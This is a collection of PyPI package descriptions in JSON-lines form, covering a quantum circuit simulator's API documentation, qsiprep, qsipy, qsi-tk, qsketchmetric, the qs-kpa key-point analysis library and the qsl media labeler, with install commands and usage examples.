The measured qubits are also read into the corresponding classical bits in the cbit_list. if cbit_list is not specified it defaults to the same list as the qbit_list.If the bits are in a superposition, the measurement operation will cause the state to randomly collapse to one or the other with the appropriate probability. In this simulator, the Python random.random() function is used to generate the randomness to decide which state to collapse into.To measure in some basis, you can apply corresponding operation (gate) to the qbits in question, measure, and then apply the inverse of that operation to those qbits.Cleary, the computations can continue after the measurement operations. Just that the overall state will have the appropriately collapsed state of the measured qubits.If qtrace is True, the resulting state is printed out.2.5qc.qreport(state=None, header=\"State\", probestates=False)Prints the current state of the system. if state argument is provided with a column numpy.matrix, it prints that state instead.\nThe argument header provides the text to be printed above the state information.\nThe argument probestates is used to limit the dumping of states information, it gets limited to only the states listed, e.g., probestates=[0,1,2,3]2.6qc.qsnapshot()Returns the a python array of all the classical bits and a python array of complex amplitudes of superposition states of the qubits in the system.2.7qc.qsize()Returns the number of qubits in the system.2.8qc.qtraceON(boolean)Turns ON or OFF printing of state after each qgate() and qmeasure() function call.2.9qc.qzerosON(boolean)Turns ON or OFF printing of zero amplitude states in trace outputs and qreport() outputs.3. OPERATOR UTILITY FUNCTIONS3.1qsim.qstretch(gate_function, list_of_qubits)qstretch takes a gate and an ordered list of qubits on which it would operate and \"stretches\" it to handleallqubits in the system. Basically, the resulting newgate takes as input all the qubits in the system provided as [msb,...,lsb], but performs the original operation only on the given list_of_qubits, and passes through all the other qubits unaffected.For instance, lets assume we created a 4 qubit system (qsim.QSimulator(4)), and in that we use C gate on qubits 3 and 0 (qgate(C(),[3,0])). Shown on the left side of the figure below. qstretch takes the same arguments and creates a gate that operates on 4 qubits, but still affects only qubits 3 and 0, passing the others through.+---+\n 3 ---.----- 3 --| . |--\n | | | |\n 2 ---|----- 2 --| | |--\n | | | |\n 1 ---|----- 1 --| | |--\n | | | |\n 0 ---O----- 0 --| O |--\n +---+\n\nqc.qgate(C(),[3,0])\u00a0 ng = qc.qstretch(C(),[3,0])\n qc.qgate(ng,[3,2,1,0])qstretch() is useful in cases where you want to make a 'blackbox' function which does an equivalent of a series of operations in one go (see the accompanying bern_vazy.py). To do that you would typically use qcombine_seq()'s and qcombine_par()'s in conjunction with qstretch()'s.3.2qsim.qinverse(op,name=None)Returns the inverse of the operator. If name argument is not provided, it generates a name by prefixing the name of the provided operator with \"INV-\"3.3qsim.qisunitary(op)Checks if the provided operator is unitary opperator or not. Returns boolean value (True or False).4. Gates in qsim4.1\tPRE-DEFINED GATESA number of gates are pre-defined in the QSimulator class. The following is the list --H()\t\tHadamard gate\nX()\t\tPauli_x gate\nY()\t\tPauli_y gate\nZ()\t\tPauli_z gate\nR(phi)\t\tPhase rotation by phi\nRk(k)\t\tPhase rotation by 2*pi/(2**k), useful in QFT algorithm\nC()\t\tCNOT gate\nSWAP()\t\tSWAP gate\nCSWAP()\t\tControlled-SWAP gate\nSQSWAP()\tSquare root of SWAP gate\nT()\t\tTOFFOLI gate\nHn(n)\t\tHadamard gates applied on n qubits, added since it is commonly used\nQFT(n)\t\tQFT gate for n qubits\nRND()\t\tRandomizes the qubit - useful for testing some cases4.2\tCONTROLLED GATESCTL(op,name=None)\nBuild a controlled gate from any gate, MSB position as control bit. Can apply CTL() multiple times e.g., CTL(CTL(op)), to add multiple control qubits.Examples:\nC() is the same as qsim.CTL(qsim.X(),name=\"CNOT\")\nT() is the same as qsim.CTL(qsim.CTL(qsim.X()),name=\"TOFFOLI\")4.3 OPERATOR UTILITY FUNCTIONS4.3.1qsim.qcombine_seq(name, op_list)Combines a sequential application of gates into one equivalent gate. The argument name is the name of the resulting gate. Argument op_list is a list of gates each of the structure [name,matrix].--[A]--[B]--[C]--[D]--\u00a0\u00a0\u00a0 ==>\u00a0\u00a0 --[G]--To combine the aboveG = qsim.qcombine_seq(\"SEQ\",[A,B,C,D])and to use it, for instance to apply it on qubit 2\n\u00a0\nqc.qgate(G,[2])4.3.2qsim.qcombine_par(name, op_list)Combines a parallel application of gates into one equivalent gate. The argument name is the name of the resulting gate. Argument op_list is a list of gates.+-+\n3 --[A]---- 3 --| |--\n2 --[B]---- ==> 2 --| |--\n1 --[C]---- 1 --|G|--\n0 --[D]---- 0 --| |--\n +-+To combine the above into one operation with 4 qubits as inputsG = qsim.qcombine_par(\"PAR\",[A,B,C,D])and to use it, for example to apply it on qubits 7,5,3,1qc.qgate(G,[7,5,3,1])An illustrative example is+--+\n1 --[H]---- 1 --|\u00a0 |--\n |H2|\n0 --[H]---- 0 --|\u00a0 |--\n +--+\nH2 = qsim.qcombine_par(\"H2\",[qsim.H(),qsim.H()])\n\n +--+\n3 ---.----- 3 --|\u00a0 |--\n | |\u00a0 |\n2 ---O----- 2 --|\u00a0 |--\n |C2|\n1 ---.----- 1 --|\u00a0 |--\n | |\u00a0 |\n0 ---O----- 0 --|\u00a0 |--\n +--+\nC2 = qsim.qcombine_par(\"C2\",[qsim.C(),qsim.C()])Create 2 entangled |Phi+> bell states, between quits 7,6 and 5,4 using these --qc.qgate(H2,[7,5])\nqc.qgate(C2,[7,6,5,4])5. CREATING USER DEFINED GATES(see accompanying user_def_gates.py)Qcsim allows using user defined gates. A user defined gate would be written as a function that returns a Python array with two elements [name_string, unitary_matrix]. The element unitary_matrix is the matrix that specifies the gate. It should be created using numpy.matrix([...],dtype=complex), or equivalent. The element name_string is a string that is a user-friendly name of that gate that is used in logs and debug traces.Here is an example of a simple way for a user to define a CNOT gate --\ndef myCNOT():\nreturn [\"MY-CNOT\", numpy.matrix([[1,0,0,0],[0,1,0,0],[0,0,0,1],[0,0,1,0]],dtype=complex)]As shown in the code above, while writing the unitary_matrix for myCNOT we assumed as if the entire system has only 2 qubits.Now, since in this definition of CNOT the higher order qubit (MSB) is the controlling qubit, hence when applying this gate to any two qubits, say, 4 and 7, where say, bit 4 is the controlling qubit, the qgate() function would be invoked as --qc.qgate(myCNOT(),[4,7])Or, if qubit 7 is to be the controlling qubit, then as --qc.qgate(myCNOT(),[7,4])Qclib does all the trickery required to convert the gate matrix to handle all the qubits of the system, and performing the gate operation only on the speciic qubits.So, in general, if the gate operates on n qubits, then it should be written as if the entire system consists of only n qubits, and when calling qgate(), the order of qubits should be [MSB, ..., LSB].The system looks at the size of the matrix specifying the gate to determine the number of qubits required for that gate. If the number is incorrect, it throws an exception.Since the gate is defined in form of a function, it can take arguments. For instance, for a rotation gate, the rotation angle can be passed as an argument --def myR(theta):\n\tc = numpy.cos(theta)\n\ts = numpy.sin(theta)\n\treturn [\"MY-Rotation({:0.4f})\".format(theta), numpy.matrix([[1,0],[0,complex(c,s)]],dtype=complex)]\nqc.qgate(myR(numpy.pi/2),[5])(Note: To see some change in the state, perform an X() or H() or some such on the qubit before the phase rotation.)6. ERROR HANDLING, EXCEPTIONSVarious function calls raise exceptions, mostly in cases where user passed arguments are incorrect. The exceptions are raised using class qsim.qSimException.Following is an example shows how these exceptions are handled --import qsim\nfrom qSimException import *\ntry:\n\tqc = qsim.QSimulator(8)\n\tqc.qgate(qsim.H(),[0])\n\tqc.qgate(qsim.C(),[0,1])\nexcept qSimException as exp:\n\tprint(exp.args)Following is the list of error messages with the name of the function, thrown in an exception --(TBD with the latest list)"} +{"package": "qsiprep", "pacakge-description": "qsiprep borrows heavily from FMRIPREP to build workflows for preprocessing q-space images\nsuch as Diffusion Spectrum Images (DSI), multi-shell HARDI and compressed sensing DSI (CS-DSI).\nIt utilizes Dipy and ANTs to implement a novel high-b-value head motion correction approach\nusing q-space methods such as 3dSHORE to iteratively generate head motion target images for each\ngradient direction and strength.Since qsiprep uses the FMRIPREP workflow-building strategy, it can also generate methods\nboilerplate and quality-check figures.Users can also reconstruct orientation distribution functions (ODFs), fiber orientation\ndistributions (FODs) and perform tractography, estimate anisotropy scalars and connectivity\nestimation using a combination of Dipy, MRTrix and DSI Studio using a JSON-based pipeline\nspecification.[Documentationqsiprep.org]"} +{"package": "qsiprep-container", "pacakge-description": "This package is a basic wrapper for qsiprep that generates the appropriate\nDocker commands, providing an intuitive interface to running the qsiprep\nworkflow in a Docker environment."} +{"package": "qsipy", "pacakge-description": "Python package about interferometry using two-mode quantum statesThis package provides functions that return various physical quantities related to interferometry experiments using twin Fock states $|n,n\\rangle$ or two-mode squeezed vacuum statesFunctions contained in this package are derived inthis articleDOI:paper published soonQuick context explanationThe scheme of the experiment that we aer considering is represented with the figure below:twin Fockortwo-mode squeezedstates are used asinputin a Mach-Zehnder interferometer ;the detection suffers from anon-unit quantum efficiency$\\eta$ ;experimentalists are interested in the measurement of the phase difference $\\phi$ between the two arms ;the observable $\\hat{O}$ that one use to perform a measurement is thesquareof thehalf differenceof particles detected at both output ports $\\hat{c}_1$ and $\\hat{c}_2$, whose expectation value is actually thevarianceof thehalf differenceof particles detected (cf. note below):\\hat{O} = \\frac{1}{4} \\left( \\hat{N}_{c_2} - \\hat{N}_{c_1} \\right)^2detailed explanation about the derivation of the formulae are given in thesupplemental materialof the article ;(note): indeed,\\langle\\hat{N}_{c_2}-\\hat{N}_{c_1}\\rangle=0and therefore4\\times\\mathrm{Var}\\left[\\hat{O}\\right]=\\left\\langle\\left(\\hat{N}_{c_2}-\\hat{N}_{c_1}\\right)^2\\right\\rangle-\\left\\langle\\hat{N}_{c_2}-\\hat{N}_{c_1}\\right\\rangle^2=\\left\\langle\\left(\\hat{N}_{c_2}-\\hat{N}_{c_1}\\right)^2\\right\\rangleInstallationMethod 1: download from PyPI (recommended for users)This package is published in the PyPI repository, it can be added to any Python environment with\nthe oneliner:pip install qsipyOr with any other Python packaging and dependency manager, such as poetry:poetry add qsipyMethod 2: cloning from the source (for contributers)You may also clone this project and use it right away. Since it is only Python scripts\nno compilation is needed. The functions of interest are defined in two separate modules:src/qsipy/tfs.py$\\Rightarrow$ for the functions related to thetwin Fock statessrc/qsipy/tms.py$\\Rightarrow$ for the functions related to thetwo-mode squeezed vacuum statesExamplesN.B.the gain in decibels (relatively to the standard quantum limit) are defined as such:$$ G = 20 \\log \\left[ \\sqrt{\\eta N} , \\Delta \\phi \\right]$$1. Phase uncertainty $\\Delta \\phi$ as a function of the measured phase differenceThe following figure shows theratiobetween thephase sensitivityachieved with those two quantum statesand the shot-noise. The quantum efficiency is set to $\\eta = 0.95$. It shows in particular that interferometrybelow the standard quantum limit (SQL)can be obtained in specific ranges of phase differences $\\phi$.The source code generating this figurecan be found here.2. Maps of the optimal $\\phi_0$ to measure, and sub-shot-noise domainsThe example 1. exhibited the fact that (for given quantum efficiency $\\eta$ and number of particles $N$) there is an optimal phase difference $\\phi_0$ to measure, in order to minimize the measurement uncertainty $\\Delta \\phi$. One can plot the maps of those optimal phases in the $(\\eta,N)$ plane, and identify the regions where sub-shot-noise interferometry may be performed.TFstands fortwin FockstateTMSstands fortwo-mode squeezed vacuumstateThe source code generating this figurecan be found here.3. Asymptotic behaviour of the phase uncertaintyKnowing the optimal phase $\\phi_0$ to estimate, one can study the asymptotic behaviour of $\\Delta \\phi_0 = \\left.\\Delta \\phi\\right|_{\\phi=\\phi_0}$. One can therefore check that as soon as $\\eta \\neq 1$, $\\Delta \\phi_0$ has a $\\mathcal{O}(N^{-1/2})$ scaling, therefore overtaking the standard quantum limit only by a constant factor.\nHere is a visualization of this asymptotic behaviour in the case $\\eta = 0.95$The source code generating this figurecan be found here.User guideCurrently the package is organized in two main modulestfsandtms, containing essentially the same functions, but considering eithertwin Fockortwo-mode squeezedstates at the input.Important abbreviations:for the sake of compactness we use the following abbreviation in the names of the functions provided byqsipy:evstands for\"expectation value\"vhdstands for\"variance of the half difference\"qestands for\"quantum efficiency\"(i.e. the value of $\\eta$)Here is the listing of the useful functions that one can use, callingtfs.myfunctionortfs.myfunction:Most important functionsdefphase_uncertainty_vhd(phi:float|npt.NDArray[np.float_],N:float|npt.NDArray[np.float_],eta:float|npt.NDArray[np.float_]=1,)->float|npt.NDArray[np.float_]:\"\"\"Returns the phase uncertainty during an interferometry experiment using- twin-Fock or two-mode squeezed states at the input (depending from which modulethe function has been called);- considering the variance of the half difference of particles detected at theoutput as the observable of interest;This function only calls either \"phase_uncertainty_vhd_perfect_qe\" or\"phase_uncertainty_vhd_finite_qe\", depending on the value of eta that it is set asargument.Parameters----------phi : float | npt.NDArray[np.float_]Phase difference between both arms of the interferometer.N : float | npt.NDArray[np.float_]Total number of particles.eta : float | npt.NDArray[np.float_], optionalQuantum efficiency of the detector, must be between 0 and 1, by default 1.Returns-------float | npt.NDArray[np.float_]Phase uncertainty.\"\"\"defoptimal_phi_vhd(N:float|npt.NDArray[np.float_],eta:float|npt.NDArray[np.float_]=1,)->float|npt.NDArray[np.float_]:\"\"\"Returns the optimal phase to estimate (minimizing the resolution) during aninterferometry experiment using detectors with finite quantum efficiency andconsidering the variance of the half difference of particles detected at the outputas the observable of interest. The detectors have a finite quantum efficiency eta.Parameters----------N : float | npt.NDArray[np.float_]Total number of particles.eta : float | npt.NDArray[np.float_], optionalQuantum efficiency of the detector, must be between 0 and 1, by default 1.Returns-------float | npt.NDArray[np.float_]Optimal phase to estimate experimentally.\"\"\"defphase_uncertainty_at_optimal_phi_vhd(N:float|npt.NDArray[np.float_],eta:float|npt.NDArray[np.float_]=1,)->float|npt.NDArray[np.float_]:\"\"\"Returns the resolution at the optimal phase to estimate during an interferometryexperiment using detectors with finite quantum efficiency eta and considering thevariance of the difference of particles at the output as the observable of interest.This function is therefore just:phase_resolution_difference_finite_qe(optimal_phi_vhd(n, eta), n, eta)Parameters----------N : float | npt.NDArray[np.float_]Total number of particles.eta : float | npt.NDArray[np.float_], optionalQuantum efficiency of the detector, must be between 0 and 1, by default 1.Returns-------float | npt.NDArray[np.float_]Optimal resolution.\"\"\"Functions with more specific usagedefev_vhd(phi:float|npt.NDArray[np.float_],N:float|npt.NDArray[np.float_],eta:float|npt.NDArray[np.float_]=1,)->float|npt.NDArray[np.float_]:\"\"\"Returns the expectation value of the variance of the half difference of number ofparticles detected at both output ports of the interferometer.Since the expectation value of the difference itself is zero, the variance isactually equal to the expectation value of the square of the difference.This function only calls either \"ev_vhd_perfect_qe\" or \"ev_vhd_finite_qe\", dependingon the value of eta that it is set as argument.Parameters----------phi : float | npt.NDArray[np.float_]Phase difference between both arms of the interferometer.N : float | npt.NDArray[np.float_]Average total number of particles in the interferometer.eta : float | npt.NDArray[np.float_], optionalQuantum efficiency of the detector, must be between 0 and 1, by default 1.Returns-------float | npt.NDArray[np.float_]Expectation value: <(1/4) * (N_output1 - N_output2) ** 2>\"\"\"defev_vhd_squared(phi:float|npt.NDArray[np.float_],N:float|npt.NDArray[np.float_],eta:float|npt.NDArray[np.float_]=1,)->float|npt.NDArray[np.float_]:\"\"\"Returns the expectation value of the power four of the half difference of numberof particles detected at both output ports of the interferometer.This function only calls either \"ev_vhd_squared_perfect_qe\" or\"ev_vhd_squared_finite_qe\", depending on the value of eta that it is set asargument.Parameters----------phi : float | npt.NDArray[np.float_]Phase difference between both arms of the interferometer.N : float | npt.NDArray[np.float_]Total number of particles.eta : float | npt.NDArray[np.float_], optionalQuantum efficiency of the detector, must be between 0 and 1, by default 1.Returns-------float | npt.NDArray[np.float_]Expectation value: <(1/16) * (N_output1 - N_output2) ** 4>\"\"\"deffluctuations_vhd(phi:float|npt.NDArray[np.float_],N:float|npt.NDArray[np.float_],eta:float|npt.NDArray[np.float_]=1,)->float|npt.NDArray[np.float_]:\"\"\"Returns the quantum fluctuations of the variance of the half difference of numberof particles detected at both output ports of the interferometer.This function only calls either \"fluctuations_vhd_perfect_qe\" or\"fluctuations_vhd_finite_qe\", depending on the value of eta that it is set asargument.Parameters----------phi : float | npt.NDArray[np.float_]Phase difference between both arms of the interferometer.N : float | npt.NDArray[np.float_]Total number of particles.eta : float | npt.NDArray[np.float_], optionalQuantum efficiency of the detector, must be between 0 and 1, by default 1.Returns-------float | npt.NDArray[np.float_]Expectation value: \"\"\"defasymptotic_ratio_phase_uncertainty_to_SQL_at_optimal_phi_vhd(eta:float|npt.NDArray[np.float_],)->float|npt.NDArray[np.float_]:\"\"\"Returns the asymptotic limit (as the number of particles goes to infinity) of the ratio between:- the phase uncertainty at the optimal phase and considering the variance of the half differenceof particles detected at the output as the observable of interest- the SQL 1/sqrt(eta N).It only depends on the quantum efficiency of the detectors.Parameters----------eta : float | npt.NDArray[np.float_]Quantum efficiency of the detector, must be between 0 and 1.Returns-------float | npt.NDArray[np.float_]Optimal phase uncertainty to SQL ratio in the asymptotic limit of N.\"\"\""} +{"package": "qsi-tk", "pacakge-description": "qsi-tkData science toolkit (TK) from Quality-Safety research Institute (QSI)Installationpip install qsi-tkContentsThis package is a master library containing various previous packages published by our team.modulesub-moduledescriptionstandalone pypi packagepublicationqsi.ioFile I/O, Dataset loadingTODO qsi-tk open datasets with algorithmsqsi.io.augData augmentation, e.g., generative modelsTODO Data aug with deep generative models. e.g., \" variational autoencoders, generative adversarial networks, autoregressive models, KDE, normalizing flow models, energy-based models, and score-based models. \"qsi.io.preData processing, e.g., channel alignment and 1D-laplacian kernel fs for e-nose data; x-binning, baseline removal for TOF MS.TODOqsi.visPlottingqsi.cscompressed sensingcs1Adaptive compressed sensing of Raman spectroscopic profiling data for discriminative tasks [J]. Talanta, 2020, doi: 10.1016/j.talanta.2019.120681Task-adaptive eigenvector-based projection (EBP) transform for compressed sensing: A case study of spectroscopic profiling sensor [J]. Analytical Science Advances. Chemistry Europe, 2021, doi: 10.1002/ansa.202100018Compressed Sensing library for spectroscopic profiling data [J]. Software Impacts, 2023, doi: 10.1016/j.simpa.2023.100492Secured telemetry based on time-variant sensing matrix \u2013 An empirical study of spectroscopic profiling, Smart Agricultural Technology, Volume 5, 2023, doi: 10.1016/j.atech.2023.100268qsi.fsqsi.fs.nch_time_series_fsmulti-channel enose data fs with 1d-laplacian conv kernel\u57fa\u4e8e\u7535\u5b50\u9f3b\u548c\u4e00\u7ef4\u62c9\u666e\u62c9\u65af\u5377\u79ef\u6838\u7684\u5976\u7c89\u57fa\u7c89\u4ea7\u5730\u9274\u522bqsi.fs.glassoStructured-fs of Raman data with group lassoin progressqsi.kernelkernelsacklAnalytical chemistry kernel library for spectroscopic profiling data, Food Chemistry Advances, Volume 3, 2023, 100342, ISSN 2772-753X, https://doi.org/10.1016/j.focha.2023.100342.qsi.drqsi.dr.metricsDimensionality Reduction (DR) quality metricspyDRMetrics, wDRMetricspyDRMetrics - A Python toolkit for dimensionality reduction quality assessment, Heliyon, Volume 7, Issue 2, 2021, e06199, ISSN 2405-8440, doi: 10.1016/j.heliyon.2021.e06199.qsi.dr.mfmatrix-factorization based DRpyMFDRMatrix Factorization Based Dimensionality Reduction Algorithms - A Comparative Study on Spectroscopic Profiling Data [J], Analytical Chemistry, 2022. doi: 10.1021/acs.analchem.2c01922qsi.claqsi.cla.metricsclassifiability analysispyCLAMs, wCLAMsA unified classifiability analysis framework based on meta-learner and its application in spectroscopic profiling data [J]. Applied Intelligence, 2021, doi: 10.1007/s10489-021-02810-8pyCLAMs: An integrated Python toolkit for classifiability analysis [J]. SoftwareX, 2022, doi: 10.1016/j.softx.2022.101007qsi.cla.ensemblehomo-stacking, hetero-stacking, FSSEpyNNRWSpectroscopic Profiling-based Geographic Herb Identification by Neural Network with Random Weights [J]. Spectrochimica Acta Part A: Molecular and Biomolecular Spectroscopy, 2022, doi: 10.1016/j.saa.2022.121348qsi.cla.kernelkernel-NNRWqsi.cla.nnrwneural networks with random weightsqsi.pipelineGeneral data analysis pipelines.qsi.guiWeb-based apps. e.g., `python -m qsi.gui.chaihu` will launch the app for bupleurum origin discrimination."} +{"package": "qsketchmetric", "pacakge-description": "QSketchMetricis a Python 2Dparametric DXFCAD rendering engine. Parametrization is done usingQCAD Professional software\u26a1\ufe0f Quickstartfromqsketchmetric.rendererimportRendererfromezdxfimportnewfromezdxfimportunitsoutput_dxf=new()output_dxf.units=units.MMinput_parametric_dxf_path='tutorial.dxf'input_variables={\"h\":50}renderer=Renderer(input_parametric_dxf_path,output_dxf,variables=input_variables)renderer.render()output_dxf.saveas('tutorial_rendered.dxf')\ud83d\udcf7 Demo showcase\u2699\ufe0f InstallationThe most common case is the installation bypip package manager:pipinstallqsketchmetric\ud83d\udcd0 DXF ParametrizationParametrization is done usingQCAD Professional software.\nYou can download thefree trialversion of the software and use it for parametrization of your DXF files.\nWe need to use it because it is the only software that supports adding custom data to DXF entities.See docs to learn more...\u2705 QSketchMetric ValidatorTo verify the proper parametrization of a DXF file during parametrization process, use theQSketchMetric Validator. It is a web application that\nallows you to upload DXF file and check if it is properly parametrized.\nIn the event of an error, the app will give you full debug report. Including\nplace where the error occurred in the DXF file and the error message.See docs to learn more...\ud83c\udfaf FeaturesParametricDXFrenderingEasy dxf files parametrization usingQCAD Professional softwareExplicit support for parametrization ofLINE,CIRCLE,ARC,POINTentitiesSupport for parametrization ofLWPOLYLINE,POLYLINE,SPLINE,ELLIPSE,MTEXT,TEXTetc.entities usingINSERTentity.Open source and daily maintained\ud83d\udcda DocumentationDocumentation is available atQSketchMetric docs\ud83d\udcc8 RoadmapExplicit support for more entities is planned in the future. If you have any suggestions, please create an issue.\nIf you want to contribute, seeHow to contributesection in the documentation. I am open to any suggestions\nand waiting for your pull requests!\u26a0\ufe0f LicenseQSketchMetric is licensed under theMITlicense.\nWhen using the QSketchMetric in your open-source project I would be grateful for a reference to the repository.\ud83c\udfc6 Hall of fameThis project exists thanks to all the people who contribute. Thank you!"} +{"package": "qs-kpa", "pacakge-description": "\ud83c\udfc5Quantitative Summarization \u2013 Key Point Analysis\ud83c\udfc5Keypoint AnalysisThis library is based on the Transformers library by HuggingFace.Keypoint Analysisquickly embeds the statements with the provided supported topic and the stances toward that topic. It is a part of our approach in theQuantitative Summarization \u2013 Key Point Analysisshared task byIBM. We use the ArgKP dataset (Bar-Haim et al., ACL-2020), which contains ~24K argument/key-point pairs, for 28 controversial topics in our training and evaluation.What's NewJuly 1, 2021First release ofqs-kpapython packageJuly 4, 2021Our method achieved the 4th position in track I of the shared task[paper]InstallationInstall with pip (stable version)pipinstallqs-kpaInstall from sources (latest version)gitclonehttps://github.com/VietHoang1512/KPA\npipinstall-e.Quick exampleCurrently, a pretrained KPA encoder withRoBERTabackbone is available, which can be automatically downloaded from Google Drive when initializing theKeyPointAnalysisinstance. We used the 4 last hidden state representations of the [CLS] token as the whole sentence embedding and trained it withTupletMarginLossandIntraPairVarianceLosson the ArgKP dataset. For the code, seemain.py.# Import needed librariesfromqs_kpaimportKeyPointAnalysis# Create a KeyPointAnalysis model# Set from_pretrained=True in order to download the pretrained modelencoder=KeyPointAnalysis(from_pretrained=True)# Model configurationprint(encoder)# Preparing data (a tuple of (topic, statement, stance) or a list of tuples)inputs=[(\"Assisted suicide should be a criminal offence\",\"a cure or treatment may be discovered shortly after having ended someone's life unnecessarily.\",1,),(\"Assisted suicide should be a criminal offence\",\"Assisted suicide should not be allowed because many times people can still get better\",1,),(\"Assisted suicide should be a criminal offence\",\"Assisted suicide is akin to killing someone\",1),]# Go and embedd everythingoutput=encoder.encode(inputs,convert_to_numpy=True)In acomparisonwith the baseline model-which directly uses sentence embedding from RoBERTa model, in a subset of ArgKP dataset (for avoiding target leakage), our model strongly outperforms and exhibits rich representation learning capacity. Evaluation metrics (relaxed and strict mean Average Precision) are retained from theKPA_2021_shared_task.Model using roBERTa directly: mAP strict = 0.4633403767342183 ; mAP relaxed = 0.5991767005443296\nOur pretrained model: mAP strict = 0.9170783671441644 ; mAP relaxed = 0.9722347939653511Detailed trainingGiven a pair of key point and argument (along with their supported topic & stance) and the matching score. Similar pairs with label 1 are pulled together, or pushed away otherwise.ModelModelBERT/ConvBERTBORTLUKEDistilBERTALBERTXLNetRoBERTaELECTRABARTMPNetSiamese Baseline\u2714\ufe0f\u2714\ufe0f\u2714\ufe0f\u2714\ufe0f\u2714\ufe0f\u2714\ufe0f\u2714\ufe0f\u2714\ufe0f\u2714\ufe0f\u2714\ufe0fSiamese Question Answering-like\u2714\ufe0f\u2714\ufe0f\u2714\ufe0f\u2714\ufe0f\u2714\ufe0f\u2714\ufe0f\u2714\ufe0f\u2714\ufe0f\u2714\ufe0f\u2714\ufe0fCustom loss Baseline\u2714\ufe0f\u2714\ufe0f\u2714\ufe0f\u2714\ufe0f\u2714\ufe0f\u2714\ufe0f\u2714\ufe0f\u2714\ufe0f\u2714\ufe0f\u2714\ufe0fLossConstrastiveOnline ConstrastiveTripletOnline Triplet (Hard negative/positive mining)DistanceEuclideanCosineManhattanUtilsK-foldsFull-flowPseudo-labelGroup the arguments by their key point and consider the order of that key point within the topic as their labels (seepseudo_label). We can now utilize available Pytorch metrics learning distance, losses, miners or reducers from this greatopen-sourcein the main training workflow. For training, we use a key point and some of its positive/negative arguments as a batch. The goal is to minimize the distance between the keypoint and positive arguments as well as the arguments themselves. This is also our best approach (single-model) so far.Training exampleAn example script for training RoBERTa on the ArgKP dataset. It runs in about 15 minutes each fold on a single Google Colab Tesla P100.OUTPUT_DIR=outputs/pseudo_label/roberta-base/echo\"OUTPUT DIRECTORY$OUTPUT_DIR\"mkdir-p$OUTPUT_DIRcpqs_kpa/pseudo_label/models.py$OUTPUT_DIRforfold_idin1234567doecho\"TRAINING ON FOLD$fold_id\"pythonscripts/main.py\\--experiment\"pseudolabel\"\\--output_dir\"$OUTPUT_DIR/fold_$fold_id\"\\--model_name_or_pathroberta-base\\--tokenizerroberta-base\\--distance\"cosine\"\\--directory\"kpm_k_folds/fold_$fold_id\"\\--test_directory\"kpm_k_folds/test/\"\\--logging_dir\"$OUTPUT_DIR/fold_$fold_id\"\\--logging_steps20\\--max_pos30\\--max_neg90\\--max_unknown15\\--overwrite_output_dir\\--num_train_epochs5\\--early_stop10\\--train_batch_size1\\--val_batch_size128\\--do_train\\--evaluate_during_training\\--warmup_steps0\\--gradient_accumulation_steps1\\--learning_rate0.00003\\--margin0.3\\--drop_rate0.2\\--n_hiddens4\\--max_len30\\--statement_max_len50\\--stance_dim32\\--text_dim256\\--num_workers4\\--seed0doneTraining with the previously defined hyper-parameters yields above mentioned mAP score. Other approaches could be found inbin.ContributorsPhan Viet HoangNguyen Duc LongBibTeX@misc{hoang2021qskpa,author={Phan, V.H. & Nguyen, D.L.},title={Keypoint Analysis},year={2021},publisher={GitHub},journal={GitHub repository},howpublished={\\url{https://github.com/VietHoang1512/KPA}}}"} +{"package": "qsl", "pacakge-description": "QSL: Quick and Simple LabelerQSL is a simple, open-source media labeling tool that you can use as a Jupyter widget. More information available athttps://qsl.robinbay.com. It supports:Bounding box, polygon, and segmentation mask labeling for images and videos (with support for video segments).Point and range-based time-series labeling.Automatic keyboard shortcuts for labels.Loading images stored locally, on the web, or in cloud storage (currently only AWS S3).Pre-loading images in a queue to speed up labeling.Please note that that QSL is still under development and there are likely to be major bugs, breaking changes, etc. Bug reports and contributions are welcome!Get started by installing usingpip install qsl. Label a folder of images and save the labels to JSON using the standalone interface usingqsl label labels.json images/*.jpg. Check out theColab Notebookfor an example of how to use the Jupyter Widget.ExamplesEach example below demonstrates different ways to label media using the tool. At the top of each are the arguments used to produce the example.To use the example with the Jupyter Widget, useqsl.MediaLabeler(**params)To use the example with the command-line application, useopen(\"project.json\", \"w\").write(json.dumps(params))and then runqsl label project.json.Imagesimportqslparams=dict(config={\"image\":[{\"name\":\"Location\",\"multiple\":False,\"options\":[{\"name\":\"Indoor\"},{\"name\":\"Outdoor\"}]},{\"name\":\"Flags\",\"multiple\":True,\"freeform\":True},{\"name\":\"Type\",\"multiple\":False,\"options\":[{\"name\":\"Cat\"},{\"name\":\"Dog\"}]},],\"regions\":[{\"name\":\"Type\",\"multiple\":False,\"options\":[{\"name\":\"Eye\"},{\"name\":\"Nose\"}]}]},items=[{\"target\":\"https://picsum.photos/id/1025/500/500\",\"defaults\":{\"image\":{\"Type\":[\"Dog\"]}}},],)qsl.MediaLabeler(**params)Videosimportqslparams=dict(config={\"image\":[{\"name\":\"Location\",\"multiple\":False,\"options\":[{\"name\":\"Indoor\"},{\"name\":\"Outdoor\"}]},{\"name\":\"Flags\",\"multiple\":True,\"freeform\":True},],\"regions\":[{\"name\":\"Type\",\"multiple\":False,\"options\":[{\"name\":\"Eye\"},{\"name\":\"Nose\"}]}]},items=[{\"target\":\"http://commondatastorage.googleapis.com/gtv-videos-bucket/sample/BigBuckBunny.mp4\",\"type\":\"video\",}],)qsl.MediaLabeler(**params)Image Batchesimportqslparams=dict(config={\"image\":[{\"name\":\"Type\",\"multiple\":False,\"options\":[{\"name\":\"Cat\"},{\"name\":\"Dog\"}]},{\"name\":\"Location\",\"multiple\":False,\"options\":[{\"name\":\"Indoor\"},{\"name\":\"Outdoor\"}]},{\"name\":\"Flags\",\"multiple\":True,\"freeform\":True},],\"regions\":[{\"name\":\"Type\",\"multiple\":False,\"options\":[{\"name\":\"Eye\"},{\"name\":\"Nose\"}]}]},items=[{\"target\":\"https://picsum.photos/id/1025/500/500\",\"defaults\":{\"image\":{\"Type\":[\"Dog\"]}}},{\"target\":\"https://picsum.photos/id/1062/500/500\",\"metadata\":{\"source\":\"picsum\"}},{\"target\":\"https://picsum.photos/id/1074/500/500\"},{\"target\":\"https://picsum.photos/id/219/500/500\"},{\"target\":\"https://picsum.photos/id/215/500/500\"},{\"target\":\"https://picsum.photos/id/216/500/500\"},{\"target\":\"https://picsum.photos/id/217/500/500\"},{\"target\":\"https://picsum.photos/id/218/500/500\"},],batchSize=2)qsl.MediaLabeler(**params)Time Seriesimportqslimportnumpyasnpx=np.linspace(0,2*np.pi,100)params=dict(config={\"image\":[{\"name\":\"Peaks\",\"multiple\":True},{\"name\":\"A or 